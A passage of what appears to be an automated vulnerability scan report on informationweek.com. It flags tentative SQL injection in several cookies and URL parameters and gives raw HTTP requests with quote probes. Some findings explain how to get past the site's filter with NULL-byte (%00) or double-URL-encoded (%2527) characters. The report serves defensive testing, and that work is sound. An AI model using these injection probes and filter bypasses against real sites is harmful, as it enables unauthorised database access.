NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:14 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:14 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529%00''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:15 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:15 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.24. http://www.informationweek.com/video/security/21090964001 [s_nr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/21090964001

Issue detail

The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%2527%2527; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:27 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:27 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.25. http://www.informationweek.com/video/security/21090964001 [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/21090964001

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:25 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:25 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/21090964001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.26. http://www.informationweek.com/video/security/44865844001 [iwkbtn_emc_101111 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/44865844001

Issue detail

The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00'; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:09 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:09 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%00''; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:10 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:10 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.27. http://www.informationweek.com/video/security/44865844001 [s_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/44865844001

Issue detail

The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:20:59 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:59 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38480


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

1.28. http://www.informationweek.com/video/security/44865844001 [s_nr cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/44865844001

Issue detail

The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00'; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68311


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/44865844001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120%00''; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:17 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:17 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/44865844001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.29. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/68553969001

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /video%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30326


<!-- <DROPLET SRC="nopagefound.jhtml"></DROPLET> -->
<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var fo
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /video%2527%2527/security/68553969001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video%2527%2527/security/68553969001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.30. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/68553969001

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/68553969001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:21:54 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:54 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /video/security/68553969001'' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/68553969001''&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.31. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/81784308001

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/81784308001' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30445


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /video/security/81784308001'' HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
